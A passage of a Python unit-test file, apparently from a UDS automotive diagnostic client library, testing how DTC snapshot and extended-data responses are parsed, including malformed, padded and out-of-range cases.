for i in xrange(8):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertFalse(response.valid)
def test_oob_values(self):
pass
def _test_oob_values(self):
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=-1, record_number=0x02)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x1000000, record_number=0x02)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=-1)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x100)
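# Subfunction 0x05 (reportDTCSnapshotRecordByRecordNumber): the request carries only the
# snapshot record number; the positive response echoes that record number and is followed by
# zero or more groups of [DTC (3 bytes), status, number of DIDs, DID, data], which is the
# layout exercised by the tests below.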
class TestReportDTCSnapshotRecordByRecordNumber(ClientServerTest): # Subfn = 0x5
class Codec4711(DidCodec):
def encode(self, did_value):
return struct.pack(u'>BBHB', did_value[u'ect'], did_value[u'tp'], did_value[u'rpm'], did_value[u'map'])
def decode(self, did_payload):
v = dict(ect=0, tp=0, rpm=0, map=0)
(v[u'ect'], v[u'tp'], v[u'rpm'], v[u'map']) = struct.unpack(u'>BBHB', did_payload)
return v
def __len__(self):
return 5
class Codec4455(DidCodec):
def encode(self, did_value):
return struct.pack(u'>H', did_value)
def decode(self, did_payload):
return struct.unpack(u'>H', did_payload)[0]
def __len__(self):
return 2
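# Snapshot data for DIDs 0x4711 and 0x4455 is decoded through the codecs above; DID 0x6789
# uses a plain struct format string ('BBB'). postClientSetUp registers all three in the
# client's 'data_identifiers' configuration so snapshot payloads can be interpreted.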
def postClientSetUp(self):
self.udsclient.config[u"data_identifiers"] = {
0x4455 : self.__class__.Codec4455,
0x4711 : self.__class__.Codec4711,
0x6789 : u'BBB'
}
def single_snapshot_assert_response(self, response):
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 1)
snapshot = dtc.snapshots[0]
self.assertTrue(isinstance(snapshot, Dtc.Snapshot))
self.assertEqual(snapshot.record_number, 0x02)
self.assertEqual(snapshot.did, 0x4711)
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifold Absolute Pressure
def single_snapshot_2_dids_assert_response(self, response):
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 2)
self.assertTrue(isinstance(dtc.snapshots[0], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[0].record_number, 0x02)
self.assertEqual(dtc.snapshots[0].did, 0x4711)
self.assertTrue(isinstance(dtc.snapshots[1], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[1].record_number, 0x02)
self.assertEqual(dtc.snapshots[1].did, 0x6789)
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifold Absolute Pressure
self.assertEqual(dtc.snapshots[1].data[0], 0x99)
self.assertEqual(dtc.snapshots[1].data[1], 0x88)
self.assertEqual(dtc.snapshots[1].data[2], 0x77)
def test_single_snapshot(self): # Example provided in standard
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x05\x02")
self.conn.fromuserqueue.put("\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20")
def _test_single_snapshot(self):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=2)
self.single_snapshot_assert_response(response)
def test_single_snapshot_zeropadding_ok_1(self): # Response with record number only, trailing zeros tolerated
data = '\x59\x05\x02'
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_snapshot_zeropadding_ok_1(self):
for i in xrange(7):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=2)
self.assertEqual(len(response.service_data.dtcs), 0)
def test_single_snapshot_zeropadding_ok_2(self): # Example provided in standard
data = '\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20'
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_snapshot_zeropadding_ok_2(self):
for i in xrange(7):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=2)
self.single_snapshot_assert_response(response)
def test_single_snapshot_zeropadding_notok_exception(self): # Record number 0, extra zero padding rejected
data = '\x59\x05\x00\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20'
self.udsclient.config[u'tolerate_zero_padding'] = False
# one extra zero is valid for this subfunction, so we start with 2 extra zeros (i+2)
for i in xrange(6):
self.wait_request_and_respond(data + '\x00' * (i + 2))
def _test_single_snapshot_zeropadding_notok_exception(self):
for i in xrange (6):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0)
def test_single_snapshot_zeropadding_notok_no_exception(self): # Record number 0, extra zero padding rejected
data = '\x59\x05\x00\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20'
self.udsclient.config[u'tolerate_zero_padding'] = False
# one extra zero is valid for this subfunction, so we start with 2 extra zeros (i+2)
for i in xrange(6):
self.wait_request_and_respond(data + '\x00' * (i + 2))
def _test_single_snapshot_zeropadding_notok_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange (6):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0)
self.assertFalse(response.valid)
def test_single_snapshot_2_did(self): # Example provided in standard
self.wait_request_and_respond("\x59\x05\x02\x12\x34\x56\x24\x02\x47\x11\xa6\x66\x07\x50\x20\x67\x89\x99\x88\x77")
def _test_single_snapshot_2_did(self):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=2)
self.single_snapshot_2_dids_assert_response(response)
def test_multiple_snapshot_multiple_dtc(self):
self.wait_request_and_respond("\x59\x05\x02\x12\x34\x56\x24\x02\x47\x11\xa6\x66\x07\x50\x20\x67\x89\x99\x88\x77\x03\x12\x34\x57\x25\x01\x44\x55\x43\x21")
def _test_multiple_snapshot_multiple_dtc(self):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xFF)
self.assertEqual(len(response.service_data.dtcs), 2)
self.assertEqual(response.service_data.dtc_count, 2)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 2)
self.assertTrue(isinstance(dtc.snapshots[0], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[0].record_number, 0x02)
self.assertEqual(dtc.snapshots[0].did, 0x4711)
self.assertTrue(isinstance(dtc.snapshots[1], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[1].record_number, 0x02)
self.assertEqual(dtc.snapshots[1].did, 0x6789)
# data
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifold Absolute Pressure
self.assertEqual(dtc.snapshots[1].data[0], 0x99)
self.assertEqual(dtc.snapshots[1].data[1], 0x88)
self.assertEqual(dtc.snapshots[1].data[2], 0x77)
dtc = response.service_data.dtcs[1]
self.assertEqual(dtc.id, 0x123457)
self.assertEqual(dtc.status.get_byte_as_int(), 0x25)
self.assertTrue(isinstance(dtc.snapshots[0], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[0].record_number, 0x03)
self.assertEqual(dtc.snapshots[0].did, 0x4455)
self.assertEqual(dtc.snapshots[0].data, 0x4321)
def test_invalid_length_no_record_number_exception(self):
self.wait_request_and_respond('\x59\x05')
def _test_invalid_length_no_record_number_exception(self):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_invalid_length_no_record_number_no_exception(self):
self.wait_request_and_respond('\x59\x05')
def _test_invalid_length_no_record_number_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertFalse(response.valid)
def test_invalid_length_incomplete_dtc_exception(self):
self.wait_request_and_respond('\x59\x05\x02\x12')
self.wait_request_and_respond('\x59\x05\x02\x12\x34')
def _test_invalid_length_incomplete_dtc_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_invalid_length_incomplete_dtc_no_exception(self):
self.wait_request_and_respond('\x59\x05\x02\x12')
self.wait_request_and_respond('\x59\x05\x02\x12\x34')
def _test_invalid_length_incomplete_dtc_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(2):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertFalse(response.valid)
def test_invalid_length_missing_status_exception(self):
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56')
def _test_invalid_length_missing_status_exception(self):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_invalid_length_missing_status_no_exception(self):
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56')
def _test_invalid_length_missing_status_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertFalse(response.valid)
def invalid_length_missing_identifier_number_server_task(self):
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25')
def test_invalid_length_missing_identifier_number_exception(self):
self.invalid_length_missing_identifier_number_server_task()
def _test_invalid_length_missing_identifier_number_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xFF)
def test_invalid_length_missing_identifier_number_no_exception(self):
self.invalid_length_missing_identifier_number_server_task()
def _test_invalid_length_missing_identifier_number_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(2):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xFF)
self.assertFalse(response.valid)
def invalid_length_missing_did_server_task(self):
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25\x01')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25\x01\x67')
def test_invalid_length_missing_did_exception(self):
self.invalid_length_missing_did_server_task()
def _test_invalid_length_missing_did_exception(self):
for i in xrange(4):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xFF)
def test_invalid_length_missing_did_no_exception(self):
self.invalid_length_missing_did_server_task()
def _test_invalid_length_missing_did_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(4):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xFF)
self.assertFalse(response.valid)
def invalid_length_missing_data_server_task(self):
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25\x01\x67\x89')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25\x01\x67\x89\x99')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25\x01\x67\x89\x99\x88')
def test_invalid_length_missing_data_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_exception(self):
for i in xrange(8):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xff)
def test_invalid_length_missing_data_no_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(8):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xff)
self.assertFalse(response.valid)
def test_bad_subfunction_exception(self):
self.wait_request_and_respond('\x59\x06\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_bad_subfunction_no_exception(self):
self.wait_request_and_respond('\x59\x06\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_record_number_exception(self):
self.wait_request_and_respond('\x59\x05\x03\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_record_number_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_bad_record_number_no_exception(self):
self.wait_request_and_respond('\x59\x05\x03\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_record_number_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_no_record(self):
self.wait_request_and_respond('\x59\x05\x02')
def _test_no_record(self):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertEqual(len(response.service_data.dtcs), 0)
self.assertEqual(response.service_data.dtc_count, 0)
def test_no_record_zero_padding_ok(self):
data = '\x59\x05\x02'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_ok(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(8):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertEqual(len(response.service_data.dtcs), 0)
self.assertEqual(response.service_data.dtc_count, 0)
def test_no_record_zero_padding_not_ok_exception(self):
data = '\x59\x05\x02'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_not_ok_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(8):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_no_record_zero_padding_not_ok_no_exception(self):
data = '\x59\x05\x02'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_not_ok_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(8):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertFalse(response.valid)
def test_oob_values(self):
pass
def _test_oob_values(self):
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=-1)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x100)
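# Shared test body for the extended-data report subfunctions. A concrete TestCase mixes this
# class in and supplies the subfunction byte and the client method name. The expected positive
# response is 0x59, subfunction echo, DTC (3 bytes), status, then one or more
# [record number, raw data] blocks whose length comes from the data_size argument or the
# 'extended_data_size' configuration entry keyed by DTC id.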
class GenericReportExtendedDataByRecordNumber(object):
def __init__(self, subfunction, client_function):
self.sb = struct.pack(u'B', subfunction)
self.badsb = struct.pack(u'B', subfunction+1)
self.client_function = client_function
def assert_single_data_response(self, response):
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x20)
self.assertEqual(len(dtc.extended_data), 1)
extended_data = dtc.extended_data[0]
self.assertTrue(isinstance(extended_data, Dtc.ExtendedData))
self.assertEqual(extended_data.record_number, 0x99)
self.assertEqual(extended_data.raw_data, '\x01\x02\x03\x04\x05')
def test_single_data(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, '\x19' + self.sb + '\x12\x34\x56\x99')
self.conn.fromuserqueue.put('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05')
def _test_single_data(self):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99, data_size=5)
self.assert_single_data_response(response)
def test_single_data_instance_param(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, '\x19' + self.sb + '\x12\x34\x56\x99')
self.conn.fromuserqueue.put('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05')
def _test_single_data_instance_param(self):
response = getattr(self.udsclient, self.client_function).__call__(dtc=Dtc(0x123456), record_number=0x99, data_size=5)
self.assert_single_data_response(response)
def test_single_data_config_size(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05')
def _test_single_data_config_size(self):
self.udsclient.config[u'extended_data_size'] = {0x123456 : 5}
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99)
self.assert_single_data_response(response)
def test_single_data_zeropadding_ok(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_data_zeropadding_ok(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(8):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99, data_size=5)
self.assert_single_data_response(response)
def test_single_data_zeropadding_notok_exception(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_data_zeropadding_notok_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(8):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99, data_size=5)
def test_single_data_zeropadding_notok_no_exception(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03\x04\x05'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_data_zeropadding_notok_no_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(8):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99, data_size=5)
self.assertFalse(response.valid)
def test_double_data(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x10\x01\x02\x03\x11\x04\x05\x06')
def _test_double_data(self):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x20)
self.assertEqual(len(dtc.extended_data), 2)
self.assertTrue(isinstance(dtc.extended_data[0], Dtc.ExtendedData))
self.assertEqual(dtc.extended_data[0].record_number, 0x10)
self.assertEqual(dtc.extended_data[0].raw_data, '\x01\x02\x03')
self.assertTrue(isinstance(dtc.extended_data[1], Dtc.ExtendedData))
self.assertEqual(dtc.extended_data[1].record_number, 0x11)
self.assertEqual(dtc.extended_data[1].raw_data, '\x04\x05\x06')
def test_no_data(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20')
def _test_no_data(self):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x20)
self.assertEqual(len(dtc.extended_data), 0)
def test_no_data_zeropadding_ok(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1) )
def _test_no_data_zeropadding_ok(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(8):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x20)
self.assertEqual(len(dtc.extended_data), 0)
def test_no_data_zeropadding_not_ok_exception(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1) )
def _test_no_data_zeropadding_not_ok_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(8):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3)
def test_no_data_zeropadding_not_ok_no_exception(self):
data = '\x59' + self.sb + '\x12\x34\x56\x20'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1) )
def _test_no_data_zeropadding_not_ok_no_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(8):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3)
self.assertFalse(response.valid)
def invalid_length_no_response_server_task(self):
self.wait_request_and_respond('')
self.wait_request_and_respond('\x59')
def test_invalid_length_no_response_exception(self):
self.invalid_length_no_response_server_task()
def _test_invalid_length_no_response_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_invalid_length_no_response_no_exception(self):
self.invalid_length_no_response_server_task()
def _test_invalid_length_no_response_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(2):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertFalse(response.valid)
def invalid_length_incomplete_dtc_server_task(self):
self.wait_request_and_respond('\x59' + self.sb)
self.wait_request_and_respond('\x59' + self.sb + '\x12')
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34')
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56')
def test_invalid_length_incomplete_dtc_exception(self):
self.invalid_length_incomplete_dtc_server_task()
def _test_invalid_length_incomplete_dtc_exception(self):
for i in xrange(4):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_invalid_length_incomplete_dtc_no_exception(self):
self.invalid_length_incomplete_dtc_server_task()
def _test_invalid_length_incomplete_dtc_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(4):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertFalse(response.valid)
def invalid_length_missing_data_server_task(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99')
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01')
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02')
def test_invalid_length_missing_data_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_exception(self):
for i in xrange(3):
with self.assertRaises(InvalidResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_invalid_length_missing_data_no_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(3):
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertFalse(response.valid)
def test_wrong_subfn_response_exception(self):
self.wait_request_and_respond('\x59' + self.badsb + '\x12\x34\x56\x20\x99\x01\x02\x03')
def _test_wrong_subfn_response_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_wrong_subfn_response_no_exception(self):
self.wait_request_and_respond('\x59' + self.badsb + '\x12\x34\x56\x20\x99\x01\x02\x03')
def _test_wrong_subfn_response_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_wrong_record_number_response_exception(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x98\x01\x02\x03')
def _test_wrong_record_number_response_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_wrong_record_number_response_no_exception(self):
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x98\x01\x02\x03')
def _test_wrong_record_number_response_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_wrong_service_response_exception(self):
self.wait_request_and_respond('\x6F' + self.sb + '\x12\x34\x56\x20\x98\x01\x02\x03')
def _test_wrong_service_response_exception(self):
with self.assertRaises(UnexpectedResponseException):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
def test_wrong_service_response_no_exception(self):
self.wait_request_and_respond('\x6F' + self.sb + '\x12\x34\x56\x20\x98\x01\x02\x03')
def _test_wrong_service_response_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x99)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_oob_values(self):
pass
def _test_oob_values(self):
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(dtc=-1, data_size=3, record_number=0x99)
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(dtc=0x1000000, data_size=3, record_number=0x99)
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=-1)
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=3, record_number=0x100)
def test_oob_values_data_size(self): # validation is made at interpret_response
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03')
self.wait_request_and_respond('\x59' + self.sb + '\x12\x34\x56\x20\x99\x01\x02\x03')
def _test_oob_values_data_size(self):
with self.assertRaises(ValueError):
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, data_size=-1, record_number=0x99)
with self.assertRaises(ValueError):
self.udsclient.config[u'extended_data_size'] = {0x123456 : -1}
getattr(self.udsclient, self.client_function).__call__(dtc=0x123456, record_number=0x99)
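# Concrete binding of the generic extended-data tests to subfunction 0x06
# (reportDTCExtendedDataRecordByDTCNumber) and the matching client method.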
class TestReportDTCExtendedDataRecordByDTCNumber(ClientServerTest, GenericReportExtendedDataByRecordNumber): # Subfn = 0x6
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericReportExtendedDataByRecordNumber.__init__(self, subfunction=0x06, client_function = u'get_dtc_extended_data_by_dtc_number')
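# Subfunction 0x07 (reportNumberOfDTCBySeverityMaskRecord): the request carries the severity
# mask followed by the status mask; the positive response returns the status availability
# mask, the DTC format identifier and a 16-bit DTC count.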
class TestReportNumberOfDTCBySeverityMaskRecord(ClientServerTest): # Subfn = 0x7
def test_normal_behaviour_param_int(self):
request = self.conn.touserqueue.get(timeout=0.2)
